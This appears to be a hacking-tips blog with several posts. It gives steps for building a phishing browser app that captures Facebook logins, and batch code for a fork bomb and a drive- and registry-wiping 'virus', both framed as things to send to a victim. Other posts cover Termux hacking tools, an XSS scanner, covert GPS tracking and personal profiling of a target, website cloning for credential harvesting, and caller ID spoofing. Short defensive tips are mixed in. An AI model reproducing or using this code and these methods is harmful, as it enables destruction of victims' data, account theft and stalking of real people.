The Best Hacking Books

Most Power Full and Read Able Books which I personaly Read and All Books Very help full.

Intelligence Hacking Book

most intelligence hacking book with free downloadable links So read here and Download Thanks For coming.

Bitcoins Earning and Hack

Top Bitcoin Books How To Earn Bitcoin Free How to hack Bitcoins Fast Free How to Get Bitcoin

Hackers and Social Media Hacks

most importent books for every one like Faceook,Gmai,Whatsapp and instagram hacking books with free Download link All Questions with answer How to hack Facebook? How to hack Gmail? How to hack Whatsapp? How to hack Instagram?

Udemy Course

I am Upload Udemy Course list With Free Download and Easy to Download Please Share links with Your Friends.This Page Only for Educational Purpose Don't Missuse This Files.....

Monday, January 13, 2020

Best Hacking/Security Tricks

Best Hacking/Security Tricks

(Today we read same use full security trick)
  1. Make Mobile Phone Secure
  2. Avoid From Facebook Hacking 



Make Mobile Phone Secure

How To Make Mobile Phone Secure this question is most impotent.

A Hacker can use any exploit to find a vulnerability in your phone and he will try different methods to access your mobile here we describe main methods.

  • Android Rat (Remote Access Tool)

Android Rat. this is a type of virus which is used to access a server or transfer data from 1 server to another server. It’s a kind of Trojan Virus which is used to generate backdoor server in victims phone, to create backdoor connection access.
How it’s possible?(Most common question)
Simple Hackers attach this virus with other normal files this process is called binding. This is a way to hide a virus in other files which can be image, songs, software, or any file a virus can be bind with any other app or data.

How to be Safe from this type of attacks?

1. Never Download Cracked App or software from unknown sources.
2. Never download free apps or tools which is paid,
3. Never use public PC to log in your account or transition like cyber cafe.
4. Check update is from an official source or not,
5. check update is the announcement on their official website or not.
6. Install Antivirus always into your phone.

Keylogger


Keylogger: Keylogger is a program which is used to record all key pressed on keyword this virus is called keylogger. keylogger is used by hackers to track your pressed keys to know what you entered your username, password, and other sensitive information. Once a keylogger installed in Computer it start monitoring all keys which are pressed by a computer user on their keyboard and advanced keylogger monitor also screenshot, application visit.Keylogger save your data and can send your all logs to the hacker in every 2 to 5 minutes and it works in the background even you can’t see it in task manager or process bar, mostly keylogger is written in c, C++, Java programming language.

There are some types of Keylogger are here:

1. Hardware KeyLogger
2. Simple Software Keylogger
3. Remote Keylogger

How To Be Safe From Keylogger
1. Install a Good antivirus in your computer
2. scan all download files well before install
3. update your windows daily bases,
4. don’t use your friend pen drive if not trusted,
5. don’t download games free which are paid.
6. don’t download cracked software from the internet
7. Download Programming from unknown sources.
8, Don’t Download Mobile Apps From unknown sources.
Avoid From Facebook Hacking


Facebook Hacking: Everyone Knows that Facebook can’t be Hack directly, Because Facebook is Secured Website and it’s not easy to hack facebook Server or crack their database. Now, how hackers can Hack your facebook? There is a lot of methods to hack facebook like keylogger, phishing, brute force, etc. 
Fallow points to Hack.......
Step: 1 
Make an Android Browser You can Create online from any Website like appsgeyser . Or in android studio.
Step: 2
Set your phishing link in Facebook URL and set it default. At first, suggest site in a browser
Step: 3
 compile it.
Step 4.
Send it to your victim and when he install this browser he thinks he is going to login in Facebook but he doesn’t know what actually changed in Facebook URL.
Step 5. Done it.

How To Be Safe From browser inject

    1. Never Download Apps from an unknown source.
    1. Download app only from play store.
    1. Don’t share your phone access with anyone.
    1. Don’t install any application received from share it
    1. Don’t Install downloaded apps. Install the new app from play store
    1. Check URL before you visit any sensitive Website like Gmail, bank, Facebook









Sunday, January 12, 2020

INCREASE INSTAGRAM FOLLOWERS and USE OF XSSPY

Increase INSTAGRAM Followers and Use of XSSPY


==============================================
This article is only for educational purposes. Any actions or activities related to the material contained on this Website are solely your responsibility.  Misuse of the information on this website can result in criminal charges brought against the persons in question.
======================================
                                       First
For Android/Termux
Step 1:
Open termux and type ‘ pkg install git ‘.Now type ‘ git clone 
Step 2:
https://github.com/thelinuxchoice/inshackle.git ‘.
Step 3:
Type ‘ cd unshackle ‘ > ‘ ls ‘.
Step 4:
To run the script type ‘ bash inshackle.sh ‘.
Step 5:
Pick any you like to you. you need to give your username and password to use the services provided

Let me know in the comments if you have any problems Plesae
=============================
Second

XSSPY (Web Application XSS Scanner)


XssPy is a python tool for finding Cross-Site Scripting vulnerabilities in websites. It uses small yet effective payloads to search for XSS vulnerabilities.

The tool has been tested parallel with paid Vulnerability Scanners and most of the scanners failed to detect the vulnerabilities that the tool was able to find.
 The tool comes with Same Functions : 
Short Scanning
Comprehensive Scanning
Finding subdomains
 Checking every input on every page

Requirements:

Android

Termux (Play Store)

Mobile data / wifi connection

Requirements for Pc/Laptop


Kali Linux

wifi connection




For Android


  1. First type "pkg install python2 git "
  2. Now type "git clone https://github.com/faizann24/XssPy.git "
  3. Now type " cd XssPy "
  4. Now type  " pip install mechanize "
  5. Type " chmod +x XssPy.py "  (give it permissions for execution)
  6. The last step to start XssPy is " python XssPy.py -h "
  7. Now to scan a website type " python XssPy.py -u anywebsite.com/xyz  "and follow the instructions.

For PC / Laptop
Type in the terminal
git clone https://github.com/faizann24/XssPy/     /opt/xsspy
Note:
The tool works on Python 2.7 and you should have mechanize installed. If mechanize is not installed, type “pip install mechanize” in the terminal.
You will also need the mechanize distribution, you can install it with pip: pip install mechanize





Saturday, January 11, 2020

Matrix Virus

Matrix Virus 
(This Virus is only for Fun)


Create Matrix Virus (My Fav )
Step 1:
Create new text file
Step 2: 
Open and type this code
@echo off
cls
color a
echo to start matrix press any key..
pause>n
del n
cls
:1
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% 
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto 1

Step 3:
 Click on file and Save as  ((Ctrl+Shift+S))


Matrix.bat




Step 4:
Press Save And Open (only Fun)

This virus look like this



Create System crash Virus
Step :1
Create new Text file









Step 2:
Open and Type this Code
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat
start game.bat



Step 3: 
Click on File and Save as (Ctrl+Shift+S)





This virus Make System Slow and Crash It........

(Send To Victim)

Create Most Dangerous Virus
Step :1
Create new Text file
Step 2:
Type This code

@echo off
del D:\*.*/f/s/q
del E:\*.*/f/s/q
del F:\*.*/f/s/q
del G:\*.*/f/s/q
del H:\*.*/f/s/q
del I:\*.*/f/s/q
del J:\*.*/f/s/q
rd/s/q D:\
rd/s/q C:\
rd/s/q E;\
STAET reg delete HKCR/.exe
STAET reg delete HKCR/.dll
STAET reg delete HKCR/*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:ntlder
attrib -r -s -h c:\window\win.ini

del c:\window\win.ini


Step 4:
Click File and Save as (Ctrl+Shift+S)

Step 4 :

Save and Send victim( Please Don't Try )



Friday, January 10, 2020

Use of Wireshark


 Using Of Wireshark



Learning how to use a sniffer effectively is probably one of the most important network-related lessons you can take, and I strongly recommend that practiced as much as possible. 






  •  Peeking at a Sniffer 
Let's begin by peeking into a Wireshark capture file. This capture was taken as I ran dhclient eth0 and then opened my browser and browsed to http://www.offensive-security.com(This is most lovely site to learn Hacking). Looking at this for the first time might be overwhelming. However, take a deep breath, examine the packet capture line by line, and implement your knowledge of TCP/IP


Packet 1: DHCP Request. You ran dhclient, which broadcasts a DHCP request to a local DHCP server. Notice the broadcast destination address 255.255.255.255 and the source IP address 0.0.0.0. 
Packet 2: A DHCP server (192.168.1.1) replies in a unicast packet and assigns the IP 192.168.1.107. At this point the browser was opened, attempting to browse to www.offensive-security.com.
Packet 3: ARP Broadcast. You've attempted to send a packet to the Internet, and before your computer can actually send it, it needs to identify the default gateway on the local network. The default gateway IP address is configured on the requesting machine, but the default gateway MAC address is unknown. My machine sends a broadcast to the whole network, asking, “Who has 192.168.1.1? Tell 192.168.1.107.”
Packet 4: All computers on the local subnet receive this broadcast and check whether 192.168.1.1 belongs to them. Only 192.168.1.1 responds to this ARP broadcast and sends an ARP unicast reply to 192.168.1.107, informing it of the MAC address requested.
Packet 5: Now that your computer knows where to send its packets in order for them to reach the internet, you need to resolve the IP of www.offensive-security.com. Your computer sends a DNS query to the DNS server defined in your TCP/IP settings (24.224.127.143) and asks the DNS server for the IP address (A record) of www.offensive-security.com.
Packet 6: The DNS server replies and tells your computer that the IP address for www.offensive-security.com is 208.88.120.8.
Packet 7: Armed with this information, your computer attempts a three-way handshake (remember that buzzword from TCP/IP?) with 208.88.120.8 on port 80 and sends an SYN request.
Packet 8: The web server responds with an ACK and sends an SYN to your machine. Packet 9: You send a final ACK to the web server and complete the three-way handshake.
Packet 10: Now that the handshake is complete, your computer can start talking with the service using a specific protocol. Since you're using a web browser, your computer sends an HTTP GET request, which retrieves the index page, and all linked images, to your browser.
Packet 11: – end: The main page of www.offensive-security.com, including all linked images, is
loaded in your browser. 

 Capture and Display Filters (CDF)

Capture dumps are rarely as clear as this since there is usually a lot of background noise on a network. Various broadcasts, miscellaneous network services, and other running applications all make life harder when it comes to traffic analysis. Wireshark has two very convenient filter schemes: capture filters and display filters. Understanding how to use these filters is a recipe to conquering Wireshark.   


 Following TCP Streams  
As you may have noticed, packets 9–end are a bit difficult to comprehend because they contain fragments of information. Most modern sniffers, Wireshark included, know how to reassemble a specific session and display it in various formats.


Thursday, January 9, 2020

Social Engineering (Tracking and Fake Call )

In Part  two we first read GPS tracking 


 GPS Track 

You can track people in many different ways, but one way is to use a device designed to help track a target.One such device is a GPS Tracker; for example, the notable SpyHawk Super Track GPS Worldwide Super Track Stick USB Data Logger available from Here

Spy Hawk Super Track GPS Track Stick 
Track Stick Manager employs an intuitive, simple-to-use interface. 
Exp:
The Spy Hawk Super Track GPS Worldwide Super Track Stick device itself is lightweight and easy to use and hide. It comes with an on/off switch but has some neat technology. When it feels movement it turns on and starts logging. When the movement stops for a period of time, it stops logging.
Tracking the target’s movements
Google Earth map—they show speed, times, time stopped
Zeroing in on the target’s travels
The data collection is where a social engineer will see the most benefit. Being able to track every time the CEO of the target company stopped for coffee, what his favorite shop is, and what gym he attends can enable the social engineer to plan an attack with the highest rate of success. Knowing the locations and stops can tell the attacker where he or she will have the best opportunities for cloning an RFID badge or making an impression of a key.
Physical tools are just one part of being a successful social engineer though.

Online Information-Gathering Tools 
Information gathering is a key aspect of social engineering.These tools can literally change the way a social engineer views and uses data. No longer are social engineers limited to what they can find in routine searches.

  • Maltego
. Maltego is a social engineer’s dream tool. This amazing tool is made by the guys at Paterva. Maltego has a community edition available for free download from their website, which is also included in every edition of BackTrack5. If you want to remove the limitations of the free edition—like the number of transforms you can run and saving data—spending around $600 will get you a full license. 

. Here is what I was able to find in less than two hours of searching using Maltego: 
His favorite food 
His favorite restaurant
His kids’ names and ages That he is divorced
His parents’ names
His brother’s name
His religion
His favorite sports team
His whole family looked like
His past business 


Why We Use Maltego?
 Maltego automates much of the information gathering and large data correlation for the user, saving hours of Googling for information and determining how all that information correlates. Finding these data relationships is where the real power of Maltego comes into play. Although the mining is useful, discovering the relationships between the information is what will help the social engineer

  • Social Engineer Toolkit (SET)
Social engineers spend much of their time perfecting the human aspect of their skills, yet many attack vectors call for the ability to produce emails or PDFs embedded with malicious code.This was the birth of the Social Engineer Toolkit. At the time of writing, SET had been downloaded more than 1.7 million times, and had quickly become the standard toolkit for social engineering audits.

SET allows the auditor to test their clients by developing targeted emails and then logging how many employees fall for these attacks. This information can then be used in training to help employees see how to spot and avoid these traps. To perform a spear phishing attack in SET, chose option 1.After pressing that number you are presented with a few options: 
1. Perform a Mass Email Attack
2.Create a FileFormat Payload
3.Create a Social-Engineering Template 

Web Attack Vector 
SET also allows the auditor to clone any website and host it locally. The power of this type of attack is that it allows the social engineer to trick users into visiting the site under the pretense of being a developer making changes, or even using the trick of adding or deleting one letter in the URL but pointing people to the new site that is cloned. 
To run this attack in SET you would choose option 2, Website Attack Vectors, from the main menu. Upon choosing option 2, you are presented with a fewoptions:
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3.Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6.Return to the previous menu
To perform this attack chose option 1, and then option 2, Site Cloner. Upon choosing Site Cloner, you will be asked which website you want to clone.


Telephone-Based Tools

people are inundated with telemarketing calls, sales pitches, and advertisements, a social engineer needs to be skilled to use the phone successfully in an audit. Despite these limitations, using the phone as a social engineering tool can lead to total compromise of a company in a very short period of time. 
  • Caller ID Spoofing

 Caller ID has become a commonplace technology in both business and home use. Especially now with cell phones replacing many of the land based phone lines people use, caller ID is part of daily life.Caller ID spoofing basically is changing the information that appears on the target’s caller ID display.
  • Spoof  Card

 One of the most popular methods of caller ID spoofing is by using a Spoof Card  Using one of these cards, you call up the 800 number given to you on the card, enter your PIN, the number you want the caller IDto display, and then the number you want to call.

  • Spoof App 

With so many people using smart phones like the iPhone, Android, or the Blackberry there has been an influx of apps created to assist in caller ID spoofing. Spoof App uses Spoof Cards (see the preceding section) but bundles the features into a package on your cell phone.

  • Password Profilers

 Another set of tools that bear mentioning help you profile targets and the passwords they may use. After you have all the information on a target you can gather, your next is to develop a profile.





Hack Me Tech